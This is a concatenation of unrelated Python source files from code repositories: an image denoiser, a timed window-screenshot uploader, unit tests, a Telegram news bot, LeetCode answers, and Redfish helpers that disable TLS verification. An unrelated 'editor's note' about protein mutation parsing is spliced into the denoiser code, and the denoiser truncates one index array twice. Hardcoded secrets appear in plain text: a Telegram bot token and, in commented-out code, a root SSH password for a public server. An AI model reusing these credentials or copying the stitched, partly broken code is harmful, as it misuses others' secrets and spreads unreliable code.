d[idx_y, idx_x]\n argsort = np.argsort(grp)\n argsort = argsort[:min(len(argsort), limit)]\n idx_x = idx_x[argsort]\n idx_y = idx_y[argsort]\n return idx_x, idx_y\n\n\ndef bm3d(im,\n sigma,\n N1_ht=8,\n N2_ht=16,\n Nstep_ht=6,\n N_S_ht=12,\n lambda2d=0,\n lambda3d=2.7,\n tau_match_ht=2500,\n N1_wie=8,\n N2_wie=16,\n Nstep_wie=6,\n N_S_wie=12,\n tau_match_wie=400):\n blocks_noisy = block_dct(im, bsize=N1_ht)\n bh, bw, _, _ = blocks_noisy.shape\n thr_im_dct = dct(im)\n thr_im_dct = hard_thr(thr_im_dct, lambda2d * sigma)\n thr_im = dct(thr_im_dct, inverse=True)\n blocks_thr = block_dct(thr_im, bsize=N1_ht)\n step1_agg = np.zeros_like(im)\n step1_weights = np.zeros_like(im)\n _ys = set() # debug\n for y in range(0, bh, Nstep_ht):\n for x in range(0, bw, Nstep_ht):\n ref = blocks_thr[y, x]\n Sy_min = max(0, y - N_S_ht)\n Sy_max = min(bh, y + N_S_ht + 1)\n Sx_min = max(0, x - N_S_ht)\n Sx_max = min(bw, x + N_S_ht + 1)\n neighborhood = blocks_thr[Sy_min:Sy_max, Sx_min:Sx_max]\n idx_x, idx_y = group(ref, neighborhood, tau_match_ht, N2_ht)\n grp = 
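# --- Editor's note: examples of the notation ProteinMutationIdentifier.fromString
# above parses, one per branch (substitution / insertion / deletion):
#   ProteinMutationIdentifier.fromString("S:D614G")      # gene S, ref D, pos 614, alt G
#   ProteinMutationIdentifier.fromString("S:ins214 EPE") # insertion, ref becomes "-"
#   ProteinMutationIdentifier.fromString("S:del69 HV")   # deletion, alt becomes "-"
# Round-tripping via .proteinChangeNotation reproduces "S:D614G".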
blocks_noisy[Sy_min:Sy_max, Sx_min:Sx_max][idx_y, idx_x]\n grp = dct(grp, axes=0)\n grp = hard_thr(grp, lambda3d * sigma)\n weights = np.square(sigma) * np.sum(grp > 0)\n if weights == 0:\n weights = 1.\n weights = 1. / weights\n grp = dct(grp, inverse=True)\n grp *= weights[np.newaxis, ...]\n idx_x = idx_x + Sx_min\n idx_y = idx_y + Sy_min\n for i in range(len(grp)):\n _ys.add((idx_y[i], idx_x[i])) # debug\n step1_agg[idx_y[i]:idx_y[i] + N1_ht, idx_x[i]:idx_x[i] + N1_ht] += grp[i]\n step1_weights[idx_y[i]:idx_y[i] + N1_ht, idx_x[i]:idx_x[i] + N1_ht] += weights\n basic_im = step1_agg / (step1_weights + 10e-8)\n\n blocks_noisy = block_dct(im, bsize=N1_wie)\n bh, bw, _, _ = blocks_noisy.shape\n blocks_basic = block_dct(basic_im, bsize=N1_wie)\n step2_agg = np.zeros_like(im)\n step2_weights = np.zeros_like(im)\n for y in range(0, bh, Nstep_wie):\n for x in range(0, bw, Nstep_wie):\n ref = blocks_basic[y, x]\n Sy_min = max(0, y - N_S_wie)\n Sy_max = min(bh, y + N_S_wie + 1)\n Sx_min = max(0, x - N_S_wie)\n Sx_max = min(bw, x + N_S_wie + 1)\n neighborhood = blocks_basic[Sy_min:Sy_max, Sx_min:Sx_max]\n idx_x, idx_y = group(ref, neighborhood, tau_match_wie, N2_wie)\n mask = np.zeros(neighborhood.shape[:2], dtype=np.bool)\n mask[idx_y, idx_x] = True\n grp_basic = neighborhood[mask]\n n_matched = len(grp_basic)\n grp_basic = grp_basic[:min(n_matched, N2_wie)]\n grp_basic = dct(grp_basic, axes=0)\n W_wie = np.square(grp_basic) / (np.square(grp_basic) + np.square(sigma))\n grp_noisy = blocks_noisy[Sy_min:Sy_max, Sx_min:Sx_max][mask]\n grp_noisy = grp_noisy[:min(n_matched, N2_wie)]\n grp_noisy = dct(grp_noisy, axes=0)\n grp_noisy *= W_wie\n weights = 1. / (np.square(sigma) * np.sum(np.square(W_wie)) + 10e-8)\n grp_noisy = dct(grp_noisy, inverse=True)\n grp_noisy *= weights\n xv = np.arange(Sx_min, Sx_max)\n yv = np.arange(Sy_min, Sy_max)\n xv, yv = np.meshgrid(xv, yv)\n xv = xv[mask]\n xv = xv[:min(n_matched, N2_wie)]\n yv = yv[mask]\n xv = xv[:min(n_matched, N2_wie)]\n for i in range(len(grp_noisy)):\n step2_agg[yv[i]:yv[i] + N1_wie, xv[i]:xv[i] + N1_wie] += grp_noisy[i]\n step2_weights[yv[i]:yv[i] + N1_wie, xv[i]:xv[i] + N1_wie] += weights\n final_im = step2_agg / (step2_weights + 10e-8)\n\n return final_im\n\n\n\n","repo_name":"BJTUSensor/AD-algorithm","sub_path":"bm3d.py","file_name":"bm3d.py","file_ext":"py","file_size_in_byte":5529,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"63"} +{"seq_id":"25697170758","text":"'''\nAuthor: y\nDate: 2022-07-12 19:34:38\nLastEditors: y\nLastEditTime: 2022-07-13 19:58:59\n'''\n# -*- coding: UTF-8 -*-\n\nimport datetime\nimport os\nimport paramiko\nimport requests\nimport threading\nimport time\nimport win32api\nimport win32con\nimport win32gui\nfrom PIL import ImageGrab\nfrom pathlib import Path\n\n\ndef match_windows(win_title):\n \"\"\"\n 查找指定窗口\n :param win_title: 窗口名称\n :return: 句柄列表\n \"\"\"\n\n hw = []\n def callback(hwnd, hwnds):\n if win32gui.IsWindowVisible(hwnd) and win32gui.IsWindowEnabled(hwnd):\n win_text = win32gui.GetWindowText(hwnd)\n # print(win_text)\n # 模糊匹配\n if win_text.find(win_title) > -1:\n hwnds.append(hwnd)\n # print(hwnds)\n\n return True\n\n win32gui.EnumWindows(callback, hw) # 列出所有顶级窗口,并传递它们的指针给callback函数\n return hw\n\n\n# 获取窗口信息\ndef get_window_pos(name):\n # name = name\n handle = match_windows(name)[0]\n print(handle)\n # handle = win32gui.FindWindow(0, name) # 类名,标题\n # 获取窗口句柄\n if handle == 0:\n return None\n else:\n # 返回坐标值和handle\n return win32gui.GetWindowRect(handle), 
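# --- Editor's note (hedged sketch): minimal use of bm3d() above on a synthetic
# image, assuming the function is importable from this module; sigma is the
# noise standard deviation on the image's own scale (the tau_match_* defaults
# suggest 0..255 data). Note that np.bool in the Wiener step was removed in
# NumPy >= 1.24 and would need np.bool_ there.
import numpy as np
rng = np.random.default_rng(0)
clean = np.zeros((64, 64)); clean[16:48, 16:48] = 128.0
noisy = clean + rng.normal(0.0, 25.0, clean.shape)
denoised = bm3d(noisy, sigma=25.0)   # two-stage: hard-threshold estimate, then Wiener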
handle\n\n\ndef func():\n # 获取坐标\n (x1, y1, x2, y2), handle = get_window_pos('Visual Studio Code')\n # print((x1, y1, x2, y2))\n # 发送还原最小化窗口的信息\n # win32gui.SendMessage(handle, win32con.WM_SYSCOMMAND, win32con.SC_RESTORE, 0)\n # 设为高亮\n # win32gui.SetForegroundWindow(handle)\n # 目录不存在,则创建截图存放的目录\n if Path(\"images\").is_dir() != 1:\n os.mkdir(\"images\")\n\n # 开始截图\n # using the grab method\n pic = ImageGrab.grab((x1, y1, x2, y2)) # 指定截取坐标(左边X,上边Y,右边X,下边Y)\n # pic = ImageGrab.grab(None)\n pic_name = time.strftime('%Y%m%d%H%M%S') + '.jpg'\n pic.mode = 'RGB'\n pic.save(\"images/\" + pic_name)\n # pic.show()\n print(\"show, now: \", datetime.datetime.now())\n\n # 通过sftp文件上传\n # ssh = paramiko.SSHClient()\n # ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n # ssh.connect(\"120.77.170.139\", 22, \"root\", \"Ss804806s\")\n # sftp = ssh.open_sftp()\n # sftp.put(pic_name, \"/www/wwwroot/images/\" + pic_name)\n # print(\"完成发送\")\n # os.remove(pic_name)\n # ssh.exec_command(\"python /www/wwwroot/ocr.py\") # 执行服务器上相应脚本\n\n # 模拟浏览器POST文件上传\n try:\n files = {'file': (pic_name, open(\"images/\" + pic_name, 'rb'), 'image/png')}\n data = {\n # \"computer\": 1\n }\n result = requests.post(url='http://127.0.0.1:5001/upload/img', data=data, files=files, headers={})\n print(result.text)\n os.remove(\"images/\" + pic_name)\n except:\n print('上传图片失败..')\n\n # 开始定时任务\n timer = threading.Timer(10, func, [])\n timer.start()\n\n\nfunc()\n","repo_name":"ForMachaca/timing-shot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"19229108804","text":"import pytest\nfrom src.data_store import data_store\nfrom src.error import AccessError, InputError\nfrom src.auth import auth_register_v2\nfrom src.dm import dm_create_v1, dm_list_v1, dm_remove_v1, dm_leave_v1\nfrom src.other import clear_v1\nimport src.help as help\n\n# test token error\ndef test_token_error():\n clear_v1()\n token_1 = auth_register_v2(\n 'abc@qq.com', '123123123123', 'aa', 'aa')\n dm_create_v1(token_1['token'], [])\n with pytest.raises(AccessError):\n dm_leave_v1(' ', 1)\n\n# test dmid error\ndef test_dmid_error():\n clear_v1()\n token_1 = auth_register_v2(\n 'abc@qq.com', '123123123123', 'aa', 'aa')\n with pytest.raises(InputError):\n dm_leave_v1(token_1['token'], 1)\n\n# test auid not in dm\ndef test_auid_not_in_dm_error():\n clear_v1()\n token_1 = auth_register_v2(\n 'abc@qq.com', '123123123123', 'aa', 'aa')\n token_2 = auth_register_v2(\n 'abcd@qq.com', '123123123123', 'bb', 'bb')\n\n dm_create_v1(token_1['token'], [])\n with pytest.raises(AccessError):\n dm_leave_v1(token_2['token'], 1)\n\n# test remove correct\ndef test_remove_correct():\n clear_v1()\n token_1 = auth_register_v2(\n 'abc@qq.com', '123123123123', 'aa', 'aa')\n token_2 = auth_register_v2(\n 'abcd@qq.com', '123123123123', 'bb', 'bb')\n token_3 = auth_register_v2(\n 'abcdee@qq.com', '123123123123', 'cc', 'cc')\n token_4 = auth_register_v2(\n 'abcdeef@qq.com', '123123123123', 'dd', 'dd')\n token_5 = auth_register_v2(\n 'abcdeefg@qq.com', '123123123123', 'ee', 'ee')\n\n dm_create_v1(token_1['token'], [])\n dm_create_v1(token_2['token'], [1])\n dm_create_v1(token_3['token'], [1,2])\n dm_create_v1(token_4['token'], [1, 2, 3])\n dm_create_v1(token_5['token'], [1, 2, 3, 4])\n\n dm_leave_v1(token_1['token'], 1)\n dm_leave_v1(token_1['token'], 2)\n dm_leave_v1(token_1['token'], 3)\n dm_leave_v1(token_1['token'], 4)\n 
dm_leave_v1(token_1['token'], 5)\n\n re_list1 = dm_list_v1(token_1['token'])\n re_list2 = dm_list_v1(token_2['token'])\n re_list3 = dm_list_v1(token_3['token'])\n re_list4 = dm_list_v1(token_4['token'])\n re_list5 = dm_list_v1(token_5['token'])\n\n print(re_list1)\n print(re_list2)\n print(re_list3)\n print(re_list4)\n print(re_list5)\n\n assert re_list1 == {'dms': []}\n assert re_list2 == {'dms': [{'dm_id': 2, 'name': 'aaaa, bbbb'}, {'dm_id': 3, 'name': 'aaaa, bbbb, cccc'}, {'dm_id': 4, 'name': 'aaaa, bbbb, cccc, dddd'}, {'dm_id': 5, 'name': 'aaaa, bbbb, cccc, dddd, eeee'}]}\n assert re_list3 == {'dms': [{'dm_id': 3, 'name': 'aaaa, bbbb, cccc'}, {'dm_id': 4, 'name': 'aaaa, bbbb, cccc, dddd'}, {'dm_id': 5, 'name': 'aaaa, bbbb, cccc, dddd, eeee'}]}\n assert re_list4 == {'dms': [{'dm_id': 4, 'name': 'aaaa, bbbb, cccc, dddd'}, {'dm_id': 5, 'name': 'aaaa, bbbb, cccc, dddd, eeee'}]}\n assert re_list5 == {'dms': [{'dm_id': 5, 'name': 'aaaa, bbbb, cccc, dddd, eeee'}]}\n\n\n\n\n","repo_name":"FXGHH/COMP1531","sub_path":"tests/tests/dm_leave_v1_test.py","file_name":"dm_leave_v1_test.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"41540974858","text":"from collections import defaultdict\nfrom lhc.interval import IntervalBinner\n\n\nclass IntervalMap(object):\n def __init__(self, key_value_pairs=None):\n self.len = 0\n self.binner = IntervalBinner()\n self.bins = defaultdict(list)\n self.values = defaultdict(list)\n\n if key_value_pairs is not None:\n for key, value in key_value_pairs:\n self[key] = value\n\n def __len__(self):\n return self.len\n\n def __iter__(self):\n for bin in self.bins.values():\n for item in bin:\n yield item\n\n def __contains__(self, item):\n bins = self.binner.get_overlapping_bins(item)\n for fr, to in bins:\n for bin in range(fr, to + 1):\n for set_interval in self.bins[bin]:\n if set_interval == item:\n return True\n return False\n\n def __setitem__(self, key, value):\n self.len += 1\n bin = self.binner.get_bin(key)\n self.bins[bin].append(key)\n self.values[bin].append(value)\n\n def __getitem__(self, item):\n bins = self.binner.get_overlapping_bins(item)\n for fr, to in bins:\n for bin in range(fr, to + 1):\n for i, set_interval in enumerate(self.bins[bin]):\n if set_interval.overlaps(item):\n yield self.values[bin][i]\n\n def iterkeys(self):\n for bin in self.bins.values():\n for item in bin:\n yield item\n\n def itervalues(self):\n for bin in self.values.values():\n for value in bin:\n yield value\n\n def iteritems(self):\n for keys, values in zip(iter(self.bins.items()), iter(self.values.items())):\n for key, value in zip(keys, values):\n yield key, value\n","repo_name":"EnjoyLifeFund/macHighSierra-py36-pkgs","sub_path":"lhc/collections/interval_map.py","file_name":"interval_map.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7512714269","text":"#библиотеки\nimport telebot\nfrom telebot import types\n#BeautifulSoup\nimport requests\nfrom bs4 import BeautifulSoup\n#Selenium\nfrom selenium.webdriver.common.keys import Keys #модуль ввода данных\nfrom selenium import webdriver #веб-драйвер\nfrom webdriver_manager.chrome import ChromeDriverManager #Chrome - браузер\nfrom selenium.webdriver.common.by import By\nfrom time import sleep\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\n\n# подключим токен\nbot = 
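# --- Editor's note (hedged sketch): typical use of IntervalMap above, assuming
# lhc.interval.Interval supplies the overlaps() method the class relies on:
#   from lhc.interval import Interval
#   m = IntervalMap()
#   m[Interval(0, 10)] = "a"
#   m[Interval(5, 15)] = "b"
#   list(m[Interval(8, 9)])  # -> ["a", "b"]; both stored intervals overlap 8..9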
telebot.TeleBot(\"2136961612:AAE-ybGpO5uVyj2nUlr7Fqy8plgUs7LFnzU\")\n\n# напишем, что делать нашему боту при команде старт\n@bot.message_handler(commands=['start'])\ndef send_keyboard(message, text=\"Хочешь узнать о новостях с главной страницы Финмаркета? Выбери интересующие тебя новости!\"):\n keyboard = types.ReplyKeyboardMarkup(row_width=2) # наша клавиатура\n itembtn1 = types.KeyboardButton('Главные новости (новость + ссылка)') # создадим кнопку\n itembtn2 = types.KeyboardButton('Поиск новостей по запросу (за текущий год)')\n itembtn3 = types.KeyboardButton('Российские фондовые индексы RTS/MOEX')\n itembtn4 = types.KeyboardButton(\"Курс евро за год\")\n itembtn5 = types.KeyboardButton('Курс доллара за год')\n itembtn6 = types.KeyboardButton('На сегодня пока всё.')\n keyboard.add(itembtn1, itembtn2) # добавим кнопки 1 и 2 на первый ряд\n keyboard.add(itembtn3, itembtn4, itembtn5, itembtn6)\n\n # пришлем это все сообщением и запишем выбранный вариант\n msg = bot.send_message(message.from_user.id,\n text=text, reply_markup=keyboard)\n\n # отправим этот вариант в функцию, которая его обработает\n bot.register_next_step_handler(msg, callback_worker)\n\n# парсинг новостей с главной страницы\ndef parcing_main():\n # формат ссылки страницы\n url = 'http://www.finmarket.ru/news/?nt=0&pg=1'\n # получим html код страницы\n response = requests.get(url)\n # html дерево\n tree = BeautifulSoup(response.content, 'html.parser')\n n = tree.find('div', {'class': \"center_column\"})\n # находим данные заголовок новости и дата\n news = n.find_all('div', {'class': \"title\"})\n dates = n.find_all('span', {'class': \"date\"})\n # список куда будем записывать данные\n parced_data = []\n # итерируемся по датам\n for i in range(len(dates)):\n # добавляем данные в наш список\n parced_data.extend({ news[i].text + '\\n' +\n 'http://www.finmarket.ru' + (news[i].a.get('href'))\n })\n parced_data_string = '\\n // \\n'.join(parced_data)\n print (parced_data)\n return (parced_data_string)\n\n#парсинг новостей по запросу (за прошедший год)\ndef parcing_search(msg):\n print(msg.text)\n a = msg.text\n bot.send_message(msg.chat.id, 'Запомнил ваш запрос, на него потребуется время, выполняю...')\n driver.get('http://www.finmarket.ru')\n sleep(1)\n selector = 'body > div.content > div.head_menu > div.top_menu_left > a.top_menu_txt.blue2'\n #element = find_element_by_css_selector(\"element_css_selector\")\n #element = driver.find_element(By.CSS_SELECTOR, \"element_css_selector\")\n #ss = driver.find_element_by_css_selector(selector)\n ss = driver.find_element(By.CSS_SELECTOR, selector)\n ss.click()\n sleep(1)\n selector = 'body > div.content > div.head_logo > div.socnet_box > a:nth-child(1)'\n ss = driver.find_element(By.CSS_SELECTOR, selector)\n ss.click()\n sleep(1)\n search = driver.find_element(By.CSS_SELECTOR,'body > div.content > div.main >' \\\n 'div.left_wide > div.center_column' \\\n '> div:nth-child(1) > div > form >' \\\n 'table:nth-child(1) > tbody > tr >' \\\n 'td:nth-child(2) > input')\n search.click()\n search_term = a\n search.send_keys(search_term)\n # находим кнопку с начальной датой\n date = driver.find_element(By.CSS_SELECTOR,'body > div.content > div.main >' \\\n 'div.left_wide > div.center_column >' \\\n 'div:nth-child(1) > div > form > table:nth-child(2) >' \\\n 'tbody > tr:nth-child(1) > td:nth-child(5) > table >' \\\n 'tbody > tr > td:nth-child(2) > input')\n # удаляем последнюю цифру даты в ячейке\n date.send_keys(Keys.BACK_SPACE)\n date.send_keys(Keys.NUMPAD0) # даты за 2020 годы нам хватит вполне, 
поэтому заменим дату начала с 2021 на 2020\n # нажимаем Показать, чтобы поиск новостей запустился\n show = driver.find_element(By.CSS_SELECTOR,'body > div.content > div.main > div.left_wide >' \\\n 'div.center_column > div:nth-child(1) > div > form >' \\\n 'table:nth-child(2) > tbody > tr:nth-child(2) > td >' \\\n 'input[type=image]:nth-child(1)')\n show.click()\n sleep(1)\n print(driver.current_url)\n url = driver.current_url\n # получим html код страницы\n response = requests.get(url)\n # html дерево\n tree = BeautifulSoup(response.content, 'html.parser')\n n = tree.find('div', {'class': \"center_column\"})\n # находим данные заголовок новости и дата\n news = n.find_all('div', {'class': \"title\"})\n dates = n.find_all('span', {'class': \"date\"})\n # список куда будем записывать данные\n parced_data = []\n # итерируемся по датам\n for i in range(len(dates)):\n # добавляем данные в наш список\n parced_data.extend({ news[i].text + '\\n' +\n 'http://www.finmarket.ru' + (news[i].a.get('href'))\n })\n parced_data_string = '\\n // \\n'.join(parced_data)\n print (parced_data)\n if parced_data_string == '':\n send_keyboard(msg, 'По вашему запросу ничего не найдено. Что нибудь еще?')\n else:\n send_keyboard(msg, parced_data_string)\n send_keyboard(msg, 'Прислал Вам новости по запросу. Что нибудь еще?')\n return (parced_data_string)\n\n# привязываем функции к кнопкам на клавиатуре\ndef callback_worker(call):\n\n # парсинг новостей с главной страницы\n if call.text == \"Главные новости (новость + ссылка)\":\n msg = bot.send_message(call.chat.id, 'Сейчас пришлю список главных новостей в чат...')\n try:\n msg2 = bot.send_message(call.chat.id, parcing_main())\n send_keyboard(call, 'Прислал Вам новости с главной страницы! Что нибудь еще?')\n except:\n send_keyboard(call, \"Возникла ошибка при парсинге данных. Что нибудь ещё?\")\n\n #парсинг новостей по запросу (за прошедший год)\n elif call.text == \"Поиск новостей по запросу (за текущий год)\":\n try:\n msg = bot.send_message(call.chat.id, 'Напишите запрос для поиска в чат. Выполню его менее чем за минуту...')\n bot.register_next_step_handler(msg, parcing_search)\n except:\n bot.send_message(call.chat.id, 'С Вашим запросом произошла ошибка. Попробуйте позже.')\n send_keyboard(call, \"Чем еще могу помочь?\")\n\n #курс доллара\n elif call.text == \"Курс доллара за год\":\n bot.send_message(call.chat.id, 'USD/RUB:')\n bot.send_photo(call.chat.id, 'https://gr04.finmarket.ru/Charts/CurrencyDynamic.aspx?src=10148&ft=52148&per=2')\n send_keyboard(call, \"Курс выведен успешно. Что нибудь еще?\")\n\n #курс евро\n elif call.text == \"Курс евро за год\":\n bot.send_message(call.chat.id, 'EUR/RUB:')\n bot.send_photo(call.chat.id, 'https://gr04.finmarket.ru/Charts/CurrencyDynamic.aspx?src=10148&ft=52170&per=2')\n send_keyboard(call, \"Курс выведен успешно. Что нибудь еще?\")\n\n #Российские фондовые индексы RTS/MOEX\n elif call.text == \"Российские фондовые индексы RTS/MOEX\":\n bot.send_message(call.chat.id, 'Динамика индекса RTS (по натуральному логарифму):')\n bot.send_photo(call.chat.id, 'https://gr04.finmarket.ru/charts/IndicatorIndexes.aspx?sec=66&ft=3099')\n bot.send_message(call.chat.id, 'Динамика индекса ММВБ (по натуральному логарифму):')\n bot.send_photo(call.chat.id, 'https://gr04.finmarket.ru/charts/IndicatorIndexes.aspx?sec=66&ft=6039')\n send_keyboard(call, \"Динамика индексов выведена. Что нибудь еще?\")\n\n #прощание\n elif call.text == \"На сегодня пока всё.\":\n bot.send_message(call.chat.id, 'До новых встреч! 
Если понадоблюсь - введите /start')\n\n@bot.message_handler(content_types=['text'])\ndef handle_docs_audio(message):\n send_keyboard(message, text=\"Пожалуйста, выберите один из пунктов меню:\")\n\n#непрерывная работа\nbot.polling(none_stop=True)\n\n","repo_name":"ivanmos96/Finmarket_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10527,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"35537322643","text":"\"\"\"\nLeetCode-116\n\nGiven a binary tree\n\nTreeLinkNode {\n TreeLinkNode *left;\n TreeLinkNode *right;\n TreeLinkNode *next;\n}\n\nPopulate each next pointer to point to its next right node.\nIf there is no next right node, the next pointer should be set to NULL.\n\nInitially, all next pointers are set to NULL.\n\nNote:\n\nYou may only use constant extra space.\nRecursive approach is fine, implicit stack space does not count as extra space for this problem.\nYou may assume that it is a perfect binary tree (all leaves are at the same level, and every parent has two children).\n\nExample:\n\nGiven the following perfect binary tree,\n\n 1\n / \\\n 2 3\n / \\ / \\\n4 5 6 7\n\nAfter calling your function, the tree should look like:\n\n 1 -> NULL\n / \\\n 2 -> 3 -> NULL\n / \\ / \\\n4->5->6->7 -> NULL\n\"\"\"\n\n\nclass Solution:\n @staticmethod\n def connect(root):\n head = root\n while head:\n cur = head\n while cur:\n if cur.left:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n cur = cur.next\n head = head.left\n return root\n","repo_name":"chinatsui/DimondDog","sub_path":"algorithm/exercise/binary_tree/populate_next_right_pointer_in_each_node.py","file_name":"populate_next_right_pointer_in_each_node.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"881291456","text":"#\n# @lc app=leetcode.cn id=160 lang=python3\n#\n# [160] 相交链表\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n map = dict()\n p = headA\n q = headB\n while(p != None or q!= None):\n if p:\n if p in map: return p\n else:\n map[p] = 0\n p = p.next\n if q:\n if q in map: return q\n else:\n map[q] = 0\n q = q.next\n return None\n \n# @lc code=end\n\n","repo_name":"PanXiebit/daliy_leetcode","sub_path":"leetcodes/160.相交链表.py","file_name":"160.相交链表.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6801975996","text":"import sys\nfrom schema import SchemaModel\nfrom collections import OrderedDict\n\n# map python 2 vs 3 imports\nif (sys.version_info < (3, 0)):\n # Python 2\n Python3 = False\n from urlparse import urlparse\n from urlparse import urljoin\n from StringIO import StringIO\n from httplib import HTTPSConnection, HTTPConnection, responses\n import urllib2\n from urllib import URLopener\n\nelse:\n # Python 3\n Python3 = True\n from urllib.parse import urlparse\n from urllib.parse import urljoin\n from io import StringIO, BytesIO\n from http.client import HTTPSConnection, HTTPConnection, responses\n import urllib.request\n from urllib.request import URLopener\n\nimport ssl\nimport json\nimport argparse\nimport base64\nimport warnings\nimport shutil\nfrom datetime import datetime\nimport gzip\nfrom 
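# --- Editor's note (hedged alternative): the dict-based solution to problem 160
# above is O(m+n) time but also O(m+n) space; the classic two-pointer variant is
# O(1) space -- each pointer walks listA then listB, so both meet at the
# intersection node (or at None after m+n steps):
#   def getIntersectionNode(headA, headB):
#       a, b = headA, headB
#       while a is not b:
#           a = a.next if a else headB
#           b = b.next if b else headA
#       return a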
xml.etree import ElementTree as ET\nimport os\nimport zipfile\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n\n###################################################################################################\n# Name: service class \n# Description: \n# \n###################################################################################################\n\t \naccept_type = {\\\n 'json' : 'application/json',\\\n 'xml' : 'application/xml',\\\n 'bad' : 'snooop/dog' ,\\\n 'json_utf8' : 'application/json;charset=utf-8' ,\\\n 'xml_utf8' : 'application/xml;charset=utf-8'\n}\ncontent_type = {\\\n 'utf8' : 'application/json; charset=utf-8' ,\\\n 'json' : 'application/json',\\\n 'xml' : 'application/xml; charset=utf-8' \\\n}\n\n# some status codes referenced during test\nHTTP_OK = 200\nHTTP_UNAUTHORIZED = 401\nHTTP_NOT_FOUND = 404\nHTTP_CREATED = 201\nHTTP_ACCEPTED = 202\nHTTP_NO_CONTENT = 204\nHTTP_NOTIMPLEMENTED = 501\nHTTP_METHODNOTALLOWED = 405\nHTTP_BADREQUEST = 400\nHTTP_NOTMODIFIED = 304\nHTTP_MOVEDPERMANENTLY = 301\nHTTP_MOVEDTEMPORARILY = 307\nHTTP_MEDIATYPENOTSUPPORTED = 415\nHTTP_NOTACCEPTABLE = 406\n \ndefault_odata_version = '4.0'\n\n###############################################################################################\n# Name: Connect_Server_NoSSL \n# Description: \n# get an http(s) connection to a server (disabled SSL).\n# if successful return the connection else return 0.\n#\t \n###############################################################################################\ndef Connect_Server_NoSSL(sut_prop, host_ip_addr) :\n if not Python3:\n # Python 2\n if sys.version_info[0:3] >= (2, 7, 9):\n # Python 2.7.9 enables cert checks by default; disable it\n cont=ssl.SSLContext(ssl.PROTOCOL_TLSv1)\n cont.verify_mode = ssl.CERT_NONE\n try:\n svr_conn = HTTPSConnection(host=host_ip_addr, strict=True, context=cont)\n except:\n exc_str = sys.exc_info()[0]\n svr_conn = 0 # failure\n\n else:\n # Python 2 but prior to 2.7.9\n try:\n svr_conn = HTTPSConnection(host=host_ip_addr, strict=True)\n except:\n exc_str = sys.exc_info()[0]\n svr_conn = 0 # failure\n\n else:\n # Python 3\n if sys.version_info[0:3] < (3, 4, 3):\n # Python 3 but prior to 3.4.3\n cont=ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)\n cont.verify_mode = ssl.CERT_NONE\n try:\n svr_conn = HTTPSConnection(host=host_ip_addr, context=cont)\n except:\n exc_str = sys.exc_info()[0]\n svr_conn = 0 # failure\n else:\n # Python 3.4.3 or later\n try:\n cntxt = ssl._create_unverified_context()\n except:\n exc_str = sys.exc_info()[0]\n cntxt = None # failure\n\n try:\n svr_conn = HTTPSConnection(host_ip_addr, context=cntxt)\n except:\n exc_str = sys.exc_info()[0]\n svr_conn = 0 # failure\n\n if (svr_conn == 0) :\n print(\"OPERATIONAL ERROR (%s) - Unable to connect to the Server %s -- exiting test...\" % (exc_str, sut_prop['DnsName']))\n print(\"Check the parameters configured for %s in the properties.json file\" % sut_prop['DisplayName'])\n ## game over.\n exit(0)\n\n return(svr_conn)\n#\n## end Connect Server No SSL\n\n###############################################################################################\n# Name: Connect_Server_NoSSL_NoHTTPS \n# Description: \n# get an http(s) connection to a server (disabled SSL).\n# if successful return the connection else return 0.\n#\t \n###############################################################################################\ndef Connect_Server_NoSSL_NoHTTPS(sut_prop, host_ip_addr) :\n\n try:\n svr_conn = HTTPConnection(host=host_ip_addr)\n except:\n exc_str = 
sys.exc_info()[0]\n svr_conn = 0 # failure\n\n if (svr_conn == 0) :\n print(\"OPERATIONAL ERROR (%s) - Unable to connect to the Server %s -- exiting test...\" % (exc_str, sut_prop['DnsName']))\n print(\"Check the parameters configured for %s in the properties.json file\" % sut_prop['DisplayName'])\n ## game over.\n exit(0)\n\n return(svr_conn)\n#\n## end Connect Server No SSL\n\n###############################################################################################\n# Name: http__set_auth_header() \n# Description: \n# common code for the http requests -- this function:\n# sets up the authorization header and centralizes code to ease\n# support accross python 2.x and 3.x\n# \n# Arguments:\n# rq_headers - dict() for the reqeust headers\n# login : login name\n# password : password\n#\n# Returns: \n###############################################################################################\ndef http__set_auth_header(rq_headers, login, password) :\n if (Python3 == True):\n bstr = login + \":\" + password\n bencode = base64.b64encode(bstr.encode(), altchars=None) \n rq_headers['Authorization'] = (\"Basic \" + bencode.decode())\n else: # python 2.x\n rq_headers['Authorization'] = (\"Basic \" + base64.b64encode(login + \":\" + password))\n \n#\n## end http__set_auth_header\n\n###############################################################################################\n# Name: get_auth_encoded \n# Description: \n# get authorization string encoded -- this function:\n# returns the encoded authorization for request header\n# supports accross python 2.x and 3.x\n# \n# Arguments:\n# login : login name\n# password : password\n#\n# Returns: encoded authorization header value \n###############################################################################################\ndef get_auth_encoded(login, password) :\n if (Python3 == True):\n bstr = login + \":\" + password\n bencode = base64.b64encode(bstr.encode(), altchars=None) \n authorization = (\"Basic \" + bencode.decode())\n else: # python 2.x\n authorization = (\"Basic \" + base64.b64encode(login + \":\" + password))\n\n return authorization\n \n## end get_auth_encoded\n\n\n###############################################################################################\n# Name: http__req_resp() \n# Description: \n# common code for the http requests -- this function:\n# 1. sets up the authorization header\n# 2. posts the 